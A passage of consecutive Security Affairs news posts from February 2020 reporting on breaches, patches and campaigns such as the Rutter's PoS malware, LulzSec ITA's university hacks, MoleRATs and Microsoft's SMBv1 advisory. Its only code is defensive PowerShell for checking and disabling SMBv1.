
Rutter’s started the investigation after it has received a report from a third party claiming there may have been unauthorized access to data from payment cards that were used at some Rutter’s locations.  The company hired a cybersecurity firms to assist it into the investigation and notified law enforcement.

“On January 14, 2020, the investigation identified evidence indicating that an unauthorized actor may have accessed payment card data from cards used on point-of-sale (POS) devices at some fuel pumps and inside some of our convenience stores through malware installed on the payment processing systems.” reads the notice issued by the company. “The malware searched for track data (which sometimes has the cardholder name in addition to card number, expiration date, and internal verification code) read from a payment card as it was being routed through the payment processing systems.”

The malware was present with different timeframes for each location, “the general timeframe beginning October 1, 2018 through May 29, 2019.”

Rutter’s

The hackers were able to steal card numbers, expiration dates, and internal verification codes from credit cards used for the payments by the customers, in some cases, the PoS malware was also able to capture the cardholder names.

“However, chip-enabled (EMV) POS terminals are used inside our convenience stores. EMV cards generate a unique code that is validated for each transaction, and the code cannot be reused.” continues the notices.

“As a result, for EMV cards inserted into the chip-reader on the EMV POS devices in our convenience stores, only card number and expiration date (and not the cardholder name or internal verification code) were involved.”

Rutter’s pointed out that the PoS malware involved in the attack didn’t copy payment data from all of the cards used at the affected locations.

Payment systems at Rutter’s car washes, ATM’s, and lottery machines in Rutter’s stores were not infected with the malware.

The company confirmed that the PoC malware has been removed from infected systems, it also announced the implementation of enhanced security measures to prevent similar incidents in the future.

Experts suggest users reviewing their payment card statements for any unauthorized activity. Customers should immediately report any unauthorized charges to their card issuer.

Rutter’s customers should also file a complaint with the Federal Trade Commission and a police report in case of fraud or identity theft.

Rutter’s also set up a dedicated call center at 888-271-9728 for additional questions.

Pierluigi Paganini

(SecurityAffairs – Rutter’s, PoS malware)

The post PoS malware infected systems at 71 locations operated by US store chain Rutter’s appeared first on Security Affairs.

Helix Bitcoin Mixer operator charged for laundering over $300M worth of Bitcoin

An American was charged with money laundering while operating the dark web Helix Bitcoin mixer service between 2014 and 2017.

Larry Dean Harmon (36), from Akron, Ohio, was charged with laundering more than $310 million worth of Bitcoin while he was operating a Darknet-based cryptocurrency laundering service between 2014 and 2017.

According to three-count indictment unsealed on February 11 in the District of Columbia, the man was charged with money laundering conspiracy, operating an unlicensed money transmitting business and conducting money transmission without a D.C. license.

Harmon operated the Helix mixer service from 2014 to 2017. this means that its customers were paying a fee to send Bitcoin to designated recipients hiding the source of the transactions.

“According to the indictment, Harmon operated Helix from 2014 to 2017.  Helix functioned as a bitcoin “mixer” or “tumbler,” allowing customers, for a fee, to send bitcoin to designated recipients in a manner that was designed to conceal the source or owner of the bitcoin.” reads the press release published by DoJ. “Helix was linked to and associated  with “Grams,” a Darknet search engine also run by Harmon.  Harmon advertised Helix to customers on the Darknet as a way to conceal transactions from law enforcement.”

Prosecutors revealed that the Helix service allowed to launder hundreds of millions of dollars of criminal profits for users in the Dark Web.

Harmon allegedly operated the dark web search engine Grams from April 2014 and the Helix Bitcoin tumbler from July 2014.

In November 2016, Harmon started a partnership with AlphaBay, the popular black market that was seized by authorities in July 2017.

According to the indictment, the Helix mixer was used to launder a total of at least around 354,468 Bitcoin (more than $300 million at the time of the transactions).

“The perceived anonymity of cryptocurrency and the Darknet may appeal to criminals as a refuge to hide their illicit activity,” said Special Agent in Charge Timothy M. Dunham of the Criminal Division of the FBI Washington Field Office.  “However, as this arrest demonstrates, the FBI and our law enforcement partners are committed to bringing the illegal practices of money launderers and other financial criminals to light and to justice, regardless of whether they are using new technological means to carry out their schemes.”

If convicted, the man will be required to forfeit to the US any property, real or personal, involved in the offense.

Pierluigi Paganini

(SecurityAffairs – Helix mixer, cybercrime)

The post Helix Bitcoin Mixer operator charged for laundering over $300M worth of Bitcoin appeared first on Security Affairs.

Three Italian universities hacked by LulzSec_ITA collective

The popular Italian hacktivist collective LulzSec ITA claimed via Twitter to have hacked three Italian universities.

The popular Italian hacktivist collective LulzSec ITA has announced via Twitter the hack of three Italian universities, highlighting the importance of the cybersecurity for our society.

The hacktivists claim that once hacked the universities did not disclose the data breach and attempted to hide the incident, violating the European Privacy Law GDPR.

Below the translation of message published by the group.

"Dear student / teacher friends, after a few months today we decided to focus our attention on you too :)
We spent  searching holes in Italian universities (and not only, we remember that dozens of universities were hacked in 2011), to try to show you that security in the academic environment must be taken seriously since the university is the den of the excellent minds of our future.
If the concept of security does not start from our schools, how can we have a better ruling class than the current one?  Since our previous attacks did not bring any sense of shame on your part, we decided to let you taste another round, until you are able to admit how is ridiculous your security.
 Lulz!" 

I reached the group to have more information about their operation, they told me that the choice to attack the universities of Basilicata, Napoli and Rome3 was casual.

As for motivation, they confirmed to me they have always had an interest in Italian education. They explained that after 9 years since the first attacks against the universities, nothing has changed from the cyber security perspective.

Two weeks after the hack, one of the universities breached by the group, Uniparthenope, sent a data breach notification via email to the impacted students and teachers. LulzSec ITA told me that the notification attempted to downplay the incident, despite the hacktivists claim to have accessed data contained in 27 databases and compromised some portals used by the university.

The other two universities, “Università della Basilicata” and Roma3 have yet to notify their students about the incident.

How did LulzSec ITA hack the universities?

In the simplest way, the hackers used a classic and very simple SQL Injection attack. Such kind of attack could be automatically launched by using very simple tools. SQL Injection attacks can allow attackers to access the target database.

It is embarrassing that universities could be hacked with a so simple technique. The hacktivists told me also that in some cases, they were able to bypass login pages without knowing the username and password, just using simply using SQL Injection strings.

Pierluigi Paganini

(SecurityAffairs – LulzSec ITA, hacking)

The post Three Italian universities hacked by LulzSec_ITA collective appeared first on Security Affairs.

MoleRATs APT group targets Palestinian territories

Security experts uncovered a new cyberespionage campaign conducted by one of the Gaza Cybergang groups (aka MoleRATs) targeting the Middle East.

Experts from the Cybereason Nocturnus team have uncovered a cyber espionage campaign allegedly carried out by one of the Gaza Cybergang groups (aka MoleRATs). 

MoleRATs is an Arabic-speaking, politically motivated group of hackers that has been active since 2012, in 2018 monitoring of the group, Kaspersky identified different techniques utilized by very similar attackers in the MENA region. Kaspersky distinguished the following three attack groups operating under Gaza Cybergang umbrella:

  • Gaza Cybergang Group1 (classical low-budget group), also known as MoleRATs;
  • Gaza Cybergang Group2 (medium-level sophistication) with links to previously known Desert Falcons;
  • Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament.

As part of the last campaign spotted by Cybereason, MoleRATs has been attempting to infiltrate the systems of both organizations and individuals.

Experts distinguish between two separate campaigns happening simultaneously that were using differed hacking tools, C2 infrastructure.

The first campaign dubbed the Spark Campaign employs social engineering to infect victims with the Spark backdoor. Most of the victims were from the Palestinian territories.

“This backdoor first emerged in January 2019 and has been continuously active since then. The campaign’s lure content revolves around recent geopolitical events, espeically the Israeli-Palestinian conflict, the assassination of Qasem Soleimani, and the ongoing conflict between Hamas and Fatah Palestinian movements.” states the report from Cybereason.

According to the experts, the Spark backdoor was specifically designed my MoleRATs to gather system information on an infected machine. 

Spark will also infect victims with Arabic keyboard and language settings.

The second campaign was tracked by the experts as the Pierogi Campaign, it employes social engineering attacks to trick victims into installing an undocumented backdoor dubbed Pierogi.

“This backdoor first emerged in December 2019, and was discovered by Cybereason. In this campaign, the attackers use different TTPs and decoy documents reminiscent of previous campaigns by MoleRATs involving the Micropsia and Kaperagent malware.” states the report.

The name ‘Pierogi’ comes after an Eastern European dish, it is a simple Delphi backdoor that was allegedly created by Ukranian-speaking hackers. 

The experts did not attribute the attack to a specific state, even if the apparent political motivation suggests the involvement of a nation-state actor. 

“It is important to remember there are many threat actors operating in the Middle East, and often there are overlaps in TTPs, tools, motivation, and victimology,” concludes the report. “There have been cases in the past where a threat actor attempted to mimic another to thwart attribution efforts, and as such, attribution should rarely be taken as is, but instead with a grain of salt.” 

Additional details, including Indicators of Compromise and MITRE ATT&CK breakdown, are included in the report published by Cybereason.

Pierluigi Paganini

(SecurityAffairs – MoleRATs, )

The post MoleRATs APT group targets Palestinian territories appeared first on Security Affairs.

US officials claim Huawei Equipment has secret backdoor for spying

Huawei can secretly tap into communications through the networking equipment, states a U.S. official, while White House urge allies to ban the Chinese giant.

This week The Wall Street Journal reported that U.S. officials say Huawei can covertly access telecom networks where its equipment is installed.

“U.S. officials say Huawei Technologies Co. can covertly access mobile-phone networks around the world through “back doors” designed for use by law enforcement, as Washington tries to persuade allies to exclude the Chinese company from their networks.” states The Wall Street Journal.

“Intelligence shows Huawei has had this secret capability for more than a decade, U.S. officials said. Huawei rejected the allegations.”

On Tuesday evening, after The Wall Street Journal quoted him as one of the officials that are accusing Huawei, the U.S. national security adviser, Robert O’Brien, made the statement at an Atlantic Council forum.

The U.S. national security adviser, Robert O’Brien, made the statement at an Atlantic Council forum on Tuesday evening, but he did not provide any evidence of the presence of the alleged backdoors.

Huawei issued a statement on Wednesday denying any accusation, it “has never and will never covertly access telecom networks, nor do we have the capability to do so.”

In November 2018, the Wall Street Journal reported that the US Government was urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States continues to highlight the risks to national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy, and Japan.

Many countries are going to build 5G infrastructure, but the approach of their governments is completely different.

Huawei

Both the UK and the European Union did not ban the Chinese equipment, the British authorities excluded Huawei from supplying equipment used in the core of the national 5G network.

“Independent cybersecurity experts say the intelligence services of global powers including the United States routinely exploit vulnerabilities in networking equipment — regardless of the manufacturer — for espionage purposes.” reported the AP News.

“The United States and other countries require that so-called “lawful intercept” capabilities be built into networks, though the equipment manufacturers are not supposed to have secret access to them.”

Some experts pointed out that while the US intelligence has yet to disclose evidence for the presence of the backdoors in the Chinese equipment, the NSA has deployed surveillance implants in the equipment from several vendors in the past, including Huawei and CISCO.

Pierluigi Paganini

(SecurityAffairs – backdoor, intelligence)

The post US officials claim Huawei Equipment has secret backdoor for spying appeared first on Security Affairs.

Google Play Protect prevented 1.9 billion malware installs from Third-party stores in 2019

Google Play Protect now scans over 100 billion applications on Android devices every day, these amazing figures were disclosed by Google.

In May 2017, Google introduced a security defense system called Google Play Protect to protect the devices running its mobile OS.

Google aims at monitoring the behavior of the apps and the detection of the malicious ones once they have been installed on Android devices.

Google Play Protect

Google Play Protect implements a machine learning and app usage analysis to identify any malicious activity on the mobile device, it is integrated into the Google Play Store app, this means that its usage is transparent to the end-user that doesn’t need to install or enable it on hid device.

Play Protect implements the following features:

  • App scanning
  • Anti-Theft Measures
  • Browser Protection

The security service also monitors the mobile apps that have been installed by users from third-party stores.

Now Google shared some data related to the activity of its protection system in 2019 when Google Play Protect prevented 1.9 billion malware installs from Third-party stores. The figures represent an increase compared to 1.6 billion, reported in the last two years ([2017], [2018]), they demonstrate the huge effort spent by the company to protect its users.

The data suggest that a growing number of Android users are attempting to install tainted apps from third-party app stores.

Google revealed that in 2019 it managed to block 790,000 violating app submissions before they were published in the official Play Store. 

“Google Play Protect scans over 100B apps everyday, providing users with information about potential security issues and actions they can take to keep their devices safe and secure.” reads the Google announcement. “Last year, Google Play Protect also prevented more than 1.9B malware installs from non-Google Play sources.”

Google reported that after the introduction of a new policy in 2018 to stop apps from unnecessarily accessing privacy-sensitive SMS and Call Log data, it has observed a 98% decrease in apps accessing such type of data.

Similarly to the SMS and Call Log policy, Google also enacted a policy to better protect families in May 2019, this resulted in the removal of tens of thousands of apps from the official Play Store, improving the security of the Android users.

“Our commitment in building the world’s safest and most helpful app platform will continue in 2020” concludes Google “and we will continue to invest in the key app safety areas mentioned in last year’s blog post:

  • Strengthening app safety policies to protect user privacy
  • Faster detection of bad actors and blocking repeat offenders
  • Detecting and removing apps with harmful content and behaviors”

Pierluigi Paganini

(SecurityAffairs – Google Play, malware)

The post Google Play Protect prevented 1.9 billion malware installs from Third-party stores in 2019 appeared first on Security Affairs.

600+ installs of WordPress Cookie Consent Plugin vulnerable to hack. Fix it now!

Developers of the popular WordPress GDPR Cookie Consent plugin have addressed a critical bug that could potentially impact 700K users.

Critical vulnerabilities in the WordPress GDPR Cookie Consent plugin could be exploited by potential attackers to delete and change the content of the sites and inject malicious JavaScript code due to improper access controls.

The GDPR Cookie Consent plugin assists users in making your website GDPR compliant.  The vulnerability was reported to the development team by the security researcher Jerome Bruandet from NinTechNet.

“The save_contentdata method allows the administrator to save the GDPR cookie notice to the database as a page post type” wrote NinTechNet.

“An authenticated user such as a subscriber can use it to put any existing page or post (or the entire website) offline by changing their status from “published” to “draft”:” “Additionally, it is possible to delete or change their content. Injected content can include formatted text, local or remote images as well as hyperlinks and shortcodes.”

The WordPress plugin is developed by WebToffee that addressed the flaw with the release of version 1.8.3, less than a week after the disclosure of the issues. The vulnerabilities affect version 1.8.2 and earlier.

The security firm WordFence also independently confirmed the flaw after the development team has addressed it. WordFence analyzed the plugin after it was fixed and noticed were a number of code changes related to capabilities check added to an AJAX endpoint used in the plugin’s administration pages.

“Because the AJAX endpoint was intended to only be accessible to administrators, the vulnerability allows subscriber-level users to perform a number of actions that can compromise the site’s security.” states WordFence.

An attacker could exploit the flaw to inject JavaScript code that will be automatically loaded and executed every time a user (authenticated or not) visits the /cli-policy-preview/ page.”

“[the issue is caused by] improper access controls lead to a stored cross-site scripting vulnerability in the GDPR Cookie Consent plugin” states the analysis published by WordFence.

Giving a look at the download history of the plugin we can see that no more than 82,000 users have installed the latest version of the plugin, this means that more than 600K installations are still vulnerable.

DOWNLOADS HISTORY
Today8.374
Yesterday72.341
Last 7 Days95.504
All Time5.104.967

Security experts at WordFence recently reported that over 200K WordPress sites are exposed to attacks due to a high severity cross-site request forgery (CSRF) bug (CVE-2020-8417) in Code Snippets.

Pierluigi Paganini

(SecurityAffairs – WordPress GDPR Cookie Consent, hacking)



The post 600+ installs of WordPress Cookie Consent Plugin vulnerable to hack. Fix it now! appeared first on Security Affairs.

Microsoft recommends Exchange admins to disable the SMBv1 protocol

Microsoft is recommending administrators to disable the SMBv1 network communication protocol on Exchange servers to prevent malware attacks.

Microsoft is urging administrators to disable the SMBv1 protocol on Exchange servers as a countermeasure against malware threats like TrickBot and Emotet.

“To make sure that your Exchange organization is better protected against the latest threats (for example Emotet, TrickBot or WannaCry to name a few) we recommend disabling SMBv1 if it’s enabled on your Exchange (2013/2016/2019) server.” reads an advisory published by the Microsoft Tech Community.

The SMBv1 protocol is a network communication protocol for providing shared access to files, printers, and serial ports between nodes on a network. It also provides an authenticated inter-process communication mechanism.

Since 2016, Microsoft is urging admins to stop using SMBv1, later versions of the protocol implemented security enhancements, such as encryption, pre-authentication integrity checks to prevent man-in-the-middle (MiTM) attacks, and insecure guest authentication blocking.

Now the Exchange is remarking the need to disable the SMBv1on exchange servers.

“There is no need to run the nearly 30-year-old SMBv1 protocol when Exchange 2013/2016/2019 is installed on your system. SMBv1 isn’t safe and you lose key protections offered by later SMB protocol versions. If you want to learn more about SMBv1 and why you should stop using it, I’d recommend reading this blog post published and updated by Ned Pyle.” continues Microsoft

“Microsoft publicly deprecated the SMBv1 protocol in 2014 and so we stopped installing it by default when using Windows Server 2016 1709 (RS3). Please see this KB for more information.

In 2017, the Shadow Brokers hacking group released a collection of NSA exploits and hacking tools targeting Microsoft’s Windows OS, some of them were developed to exploit the SMBv1 protocol to execute commands on vulnerable servers with administrative privileges.

Two of the most popular exploits today implemented in several malware strains are EternalBlue and EternalRomance. The list of malware including the exploits is long and includes Emotet, TrickBot, WannaCry, Retefe, NotPetya, and the Olympic Destroyer.

SMBv1 is no longer installed by default since Windows 10 version 1709 and Windows Server version 1709, while latest versions of the operating systems are using SMBv3.

To check if SMBv1 is enabled on a Windows server, users can execute the following PowerShell commands depending on their Windows Server version.

Windows Server 2008 R2: By default, SMBv1 is enabled in Windows Server 2008 R2. Therefore, if the following command does not return an SMB1 value or an SMB1 value of 1, then it is enabled. If it returns an SMB1 value of 0, it is disabled.

Get-Item HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters | ForEach-Object {Get-ItemProperty $_.pspath}

Windows Server 2012: If the command returns false, SMBv1 is not enabled.

Get-SmbServerConfiguration | Select EnableSMB1Protocol

Windows Server 2012 R2 or higher: If the command returns false, SMBv1 is not enabled.

(Get-WindowsFeature FS-SMB1).Installed
Get-SmbServerConfiguration | Select EnableSMB1Protocol

If SMBv1 is enabled on admins’ server, they can disable it using the following commands.

Windows Server 2008 R2:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name SMB1 -Type DWORD -Value 0 –Force

Windows Server 2012:

Set-SmbServerConfiguration -EnableSMB1Protocol $false -force

Windows Server 2012 R2 or higher:

Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol
Set-SmbServerConfiguration -EnableSMB1Protocol $false

Pierluigi Paganini

(SecurityAffairs – Microsoft Exchange, SMBv1)

The post Microsoft recommends Exchange admins to disable the SMBv1 protocol appeared first on Security Affairs.

Siemens fixed multiple DoS flaws in several products

Siemens issued Patch Tuesday updates for February 2020 that fixed serious denial-of-service (DoS) flaws in several of its products.

Siemens released Patch Tuesday updates for February 2020 that address serious denial-of-service (DoS) flaws in several of its products.

According to the advisories released by the vendor, a high-severity DoS flaw affects Siemens SIMATIC PCS 7, SIMATIC WinCC and SIMATIC NET PC products.

“A Denial-of-Service vulnerability was found in SIMATIC PCS 7, SIMATIC WinCC and SIMATIC NET PC software when encrypted communication is enabled.” reads the security advisory published by Siemens. “The vulnerability could allow an attacker with network access to cause a Denial-of-Service condition under certain circumstances (versions prior to SIMATIC WinCC V7.3 or SIMATIC PCS 7 V8.1 are not affected as encrypted communication is not an option).”

The flaw could be exploited if encrypted communication is enabled by sending specially crafted messages to the vulnerable system over the network. An attacker could exploit the issue without system privileges or user interaction. The flaw, tracked with the ID SSA-270778 received a CVSS score of 7.5.

siemens logo

Siemens addressed another DoS vulnerability that affects some SIMATIC S7 CPUs. The vulnerability can be exploited by an unauthenticated attacker by sending specially crafted HTTP requests to TCP ports 80 or 443.

Siemens fixed a DoS flaw that resides in many of its products using Profinet-IO (PNIO) stack versions prior to 06.00.

Siemens fixed two of the flaws in several industrial products, both are related to the handling of SNMP messages.

Siemens also fixed an issue in its S7-1500 CPUs which can be exploited by sending specially crafted UDP packets to a device.

The complete list of DoS vulnerabilities addressed by the IT vendor is reported in the advisories published by the company.

Pierluigi Paganini

(SecurityAffairs – ICS, DoS)

The post Siemens fixed multiple DoS flaws in several products appeared first on Security Affairs.

Reading the 2019 Internet Crime Complaint Center (IC3) report

The FBI’s Internal Crime Complaint Center (IC3) released the FBI 2019 Internet Crime Report, a document that outlines cybercrime trends over the past year.

Here we are to analyze the annual  FBI 2019 Internet Crime Complaint Center (IC3), one of the most interesting documents on the crime trends observed in the last 12 months.

The figure that most of all capture our attention is that victims of cybercrime activities lost $3.5 Billion in 2019.

The FBI’s Internet Crime Complaint Center (IC3) report is based on the 467,361 complaints received during 2019 by the authorities .

IC3 says that the losses reported by victims between 2015 and 2019 counted for $10.2 billion.

The most frequently reported complaints were related to phishing attempts, non-payment/non-delivery scams, and extortion.

“IC3 received 467,361 complaints in 2019—an average of nearly 1,300 every day—and recorded more than $3.5 billion in losses to individual and business victims. The most frequently reported complaints were phishing and similar ploys, non-payment/non-delivery scams, and extortion.” reads the FBI’s Internet Crime Complaint Center (IC3) report.

“The most financially costly complaints involved business email compromise, romance or confidence fraud, and spoofing, or mimicking the account of a person or vendor known to the victim to gather personal or financial information.”

IC3 experts warn that cybercrime is becoming even more sophisticated to evade detection and for the victims, it is getting more difficult to discover the fraudulent activities.

“Criminals are getting so sophisticated,” said Donna Gregory, IC3 chief. “It is getting harder and harder for victims to spot the red flags and tell real from fake.”

“You may get a text message that appears to be your bank asking you to verify information on your account,” said Gregory. “Or you may even search a service online and inadvertently end up on a fraudulent site that gathers your bank or credit card information.”

The report confirms that Business email compromise (BEC), or email account compromise, continues to be a major concern, in 2019, IC3 recorded 23,775 complaints about this type of attack. BEC scams resulted in more than $1.7 billion in losses.

“In the last year, IC3 reported seeing an increase in the number of BEC complaints related to the diversion of payroll funds. “In this type of scheme, a company’s human resources or payroll department receives an email appearing to be from an employee requesting to update their direct deposit information for the current pay period,” the report said.” continues the report. “The change instead routes an employee’s paycheck to a criminal.”

2019 Internet Crime Report

The IC3 highlights the importance of reporting crimes to the authorities to prevent further criminal activities and track cyber crooks.

IC3 praised the work of the Recovery Asset Team (RAT) that was established in February 2018 to help victims recover funds lost due to cyber crimes.

In 2019, the group allowed the victim to recover over $300 million stolen through online scams, for a 79% return rate of reported losses.

Experts also state that Tech Support Fraud continues to be a growing problem, in 2019, the IC3 received 13,633 complaints about this kind of crime from victims residing in 48 countries.

Authorities recorded losses amounting to over $54 million, representing a 40 percent increase when compared to 2018. Most of the victims of tech support fraud scams were over 60 years of age.

In 2019, the IC3 also received 2,047 complaints related to ransomware infections, with adjusted losses of over $8.9 million.

For additional info let me suggest reading the full 2019 Internet Crime Report.

Pierluigi Paganini

(SecurityAffairs – IC3, cybercrime)

The post Reading the 2019 Internet Crime Complaint Center (IC3) report appeared first on Security Affairs.

Crypto AG was spied for US, German intelligence agencies for decades

Swiss authorities are investigating into allegations the company Crypto AG, a Switzerland-based maker of encryption devices, was a front company for the CIA and German intelligence.

According to a joint report published by Germany’s ZDF public broadcaster and The Washington Post the Swiss-based firm Crypto AG was operating for CIA and the German Intelligence agency providing them with access to encrypted communications of more than 120 countries for decades.

The investigation conducted by the media is based on documents from the CIA and Germany’s BND foreign intelligence agency.

The list of Crypto’s customers included Iran, India and Pakistan, military juntas in Latin America and the Vatican.

The company was completely under the control of the spy agencies since 1970. The documents explicitly refer some historical events when the agencies used the access grant by Crypto AG to monitor Iran’s mullahs during the 1979 hostage crisis, fed Britain intelligence about Argentina’s military during the Falklands War, and caught Libyan officials congratulating themselves on the 1986 bombing of Berlin’s La Belle nightclub, which was frequented by American servicemen.

According to intelligence experts, in the 1980s, a large portion of foreign communications processed by US intelligence officials (40%) had been accessed through Crypto’s systems.

Crypto was liquidated in 2018, but its products are still in use in more than a dozen countries.

“Swiss Defense Ministry spokeswoman, Carolina Bohren, told The Associated Press that “following research carried out by the media” her office had notified the Cabinet about the Crypto case on November 5, 2019. On Jan. 15, the decision was made to appoint a former supreme court judge to look into the reports and report back by the end of June.” reported the Associated Press.

“The events under discussion date back to 1945 and are difficult to reconstruct and interpret in the present-day context,”.

The involvement in the surveillance activity of the company was a profitable business that allowed Crypto AG to amass millions of dollars paid by the CIA and BND.

“Foreign governments were paying good money to the US and West Germany for the privilege of having their most secret communications read by at least two (and possibly as many as five or six) foreign countries,” wrote a report by the CIA into the operation.

Intelligence experts suspected the involvement of western spy agencies in Crypto since 1990s, for this reason, Russia and China never trusted the company’ machines and did not use them.

The AP News cited a case that took place in 1992, at the time a Crypto representative was arrested in Iran and spent months in prison before being released after the BND allegedly paid a $1 million dollar ransom.

Konstantin von Notz, a German lawyer and politician, member of the Alliance ’90/The Greens party, who sits on the parliamentary committee that oversees the BND, told ZDF that will ask more transparency on the case.

The BND used the proceeds generated from the sale of cryptography devices to fund field operations, while the CIA used the money to buy competitors and create the conditions for a monopoly for Crypto.

Erich Schmidt-Eenboom, a German intelligence expert who helped analyze the documents, told the APNews that it is not credible that the Swiss government wasn’t aware of Crypto’s activity of western intelligence.

“That’s not credible,” he said. “They shut both eyes.”

The Swiss government declared that it was informed of the case only in November 2019, then he decided to investigate into the case.

Swedish firm Crypto International that was formed after part of the original company was acquired by an investor in 2018, declared that it had “no connections to the CIA or the BND” and was very distressed by the reports.

Pierluigi Paganini

(SecurityAffairs – Crypto AG, intelligence)

The post Crypto AG was spied for US, German intelligence agencies for decades appeared first on Security Affairs.

Microsoft Patch Tuesday updates for February 2020 fix IE 0day flaw

Microsoft February 2020 Patch Tuesday updates address a total of 99 new vulnerabilities, including an Internet Explorer zero-day exploited in the wild.

Microsoft has released the Patch Tuesday updates for February 2020 that address a total of 99 vulnerabilities, including an Internet Explorer zero-day tracked as CVE-2020-0674 reportedly exploited by the APT group.

In January, Microsoft has published a security advisory (ADV200001) that includes mitigations for the CVE-2020-0674 zero-day remote code execution (RCE) flaw.

The tech giant confirmed that the CVE-2020-0674 zero-day vulnerability has been actively exploited in the wild.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the advisory published by Microsoft. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

An attacker could exploit the flaw to can gain the same user permissions as the user logged into the compromised Windows device. If the user is logged on with administrative permissions, the attacker can exploit the flaw to take full control of the system.

The CVE-2020-0674 flaw could be triggered by tricking victims into visiting a website hosting a specially crafted content designed to exploit the issue through Internet Explorer.

Microsoft announced that it was working on a patch to address the issue, meantime it suggested restricting access to JScript.dll using the following workaround to mitigate this zero-day flaw.

The flaw was reported by Google’s Threat Analysis Group and Chinese cybersecurity firm Qihoo 360, the latter security company confirmed that the DarkHotel group is the threat actor that exploited the issue in attacks in the wild.

The first Darkhotel espionage campaign was spotted by experts at Kaspersky Lab in late 2014, according to the researchers the APT group has been around for nearly a decade while targeting selected corporate executives traveling abroad. According to the

According to the experts, threat actors behind the Darkhotel campaign aimed to steal sensitive data from executives while they are staying in luxury hotels, the worrying news is that the hacking crew is still active.

The attackers appeared high skilled professionals that exfiltrated data of interest with a surgical precision and deleting any trace of their activity. The researchers noticed that the gang never go after the same target twice. The list of targets includes  CEOs, senior vice presidents, top R&D engineers, sales and marketing directors from the USA and Asia traveling for business in the APAC region.

Security researchers believe the APT group is a North Korea-linked nation-state actor.

12 of the total vulnerabilities fixed by Microsoft this month are rated as critical in severity, and the remaining ones have been rated as important.

Microsoft Patch Tuesday updates for February 2020 also address four important-severity vulnerabilities, two privilege escalation flaws in Windows, an information disclosure bug affecting IE and Edge, and a secure boot bypass method. All four flaws have been publicly disclosed before the company addressed them.

Ad usual let me suggest to give a look at the analysis of the security updates made by Trend Micro’s Zero Day Initiative (ZDI).

Pierluigi Paganini

(SecurityAffairs – Patch Tuesday updates for February 2020 , hacking)

The post Microsoft Patch Tuesday updates for February 2020 fix IE 0day flaw appeared first on Security Affairs.

440M records found online in unprotected database belonging to Estée Lauder

A security expert discovered that the Cosmetic firm Estée Lauder exposed 440 million records online in a database that was left unsecured.

The security expert Jeremiah Fowler discovered an unsecured database belonging to the Cosmetic firm Estée Lauder that contained 440,336,852 records.

Estée Lauder is an American multinational manufacturer and marketer of prestige skincare, makeup, fragrance and hair care products, it owns multiple brands, distributed internationally through both digital commerce and retail channels.

Fowler discovered the unsecured database on January 30 and attempted to report its discovery to the company. 

“On January 30th I discovered a non-password protected database that contained a massive amount of records totaling 440,336,852. Upon further review I was able to see connections to New York based cosmetic company Estée Lauder.” reads the post published by the researcher. “I could see audit logs that contained a large number of email addresses in each document. I immediately sent a responsible disclosure notice Estée Lauder alerting them to the exposure.”

The exposed data included user email addresses in plain text, the archive also contained Internal email addresses from the @estee.com domain. 

The archive included audit logs containing a large number of email addresses in each document. 

ESTĒE LAUDER

The archive also contained technical information, including IP addresses, ports, and paths, that could be used by attackers to gather intelligence on the company infrastructure.

“There were millions of records pertaining to middleware that is used by the Estée Lauder company. Middleware is software that provides common services and capabilities to applications outside of what’s offered by the operating system.” continues the post. “Data management, application services, messaging, authentication, and API management are all commonly handled by middleware. Another danger of this exposure is the fact that middleware can create a secondary path for malware, through which applications and data can be compromised.”

Fowler warns that the exposure of middleware records could allow attackers to create a secondary path for malware.

The good news is that the database was rapidly secured, no payment data or sensitive employee information was apparently stored in the archive. 

At the time it is not clear how many email addresses were exposed in the database and for how long the data was exposed online. The expert also remarked that it is not clear whether the data was accessed by third parties, including threat actors or not. 

“It is unclear exactly how many “user” email addresses were exposed. It is also unclear how long the Estée Lauder database was exposed or who else may have accessed the records.” concluded the post.

Pierluigi Paganini

(SecurityAffairs – Data Leak, Estée Lauder)

The post 440M records found online in unprotected database belonging to Estée Lauder appeared first on Security Affairs.

Adobe addresses 42 flaws in its five products

Adobe February 2020 Patch Tuesday updates address a total of 42 vulnerabilities in five products, dozens of them rated as critical severity.

Adobe February 2020 Patch Tuesday updates address a total of 42 vulnerabilities in Framemaker, Acrobat and Reader, Flash Player, Digital Editions and Experience Manager products.

Most of the vulnerabilities (21) affect the Windows version of the Framemaker document processor. The most severe issues are classified as critical buffer overflow, heap overflow, out-of-bounds write, and memory corrupt flaws. The vulnerabilities can lead to arbitrary code execution in the context of the current user.

The flaws were reported to the company through Trend Micro’s Zero Day Initiative by the researcher who goes online with the moniker “Kdot”.

Adobe also addressed a total of 17 flaws in the Windows and macOS versions of its Acrobat and Reader products.

The IT firm addressed critical memory corruption issues that can be exploited by attackers to execute arbitrary code on vulnerable systems, and critical privilege escalation bugs that can allow an attacker to write arbitrary files to the system. The remaining flaws in Acrobat and Reader products have been rated as moderate severity memory leaks and important-severity information disclosure vulnerabilities.

The flaws were reported to Adobe by independent experts and researchers from Qihoo 360, Tencent, Renmin University of China, Cisco Talos, the Chinese Academy of Sciences, Baidu, and McAfee.

Adobe addressed a new critical arbitrary code execution flaw in Flash Player, successfull exploitation could lead to arbitrary code execution in the context of the current user.

Adobe has also addressed two vulnerabilities in Digital Editions, including a critical command injection bug and an important information disclosure vulnerability.

The IT giant also fixed an important denial-of-service (DoS) issue that affects versions 6.5 and 6.4 of the Adobe Experience Manager.

Adobe confirmed that it’s not aware of any attacks exploiting these vulnerabilities in the wild

Pierluigi Paganini

(SecurityAffairs – Adobe, Patch Tuesday)

The post Adobe addresses 42 flaws in its five products appeared first on Security Affairs.

OT attacks increased by over 2000 percent in 2019, IBM reports

According to IBM, OT attacks increased by over 2000 percent in 2019, most of them involved the Echobot IoT malware.

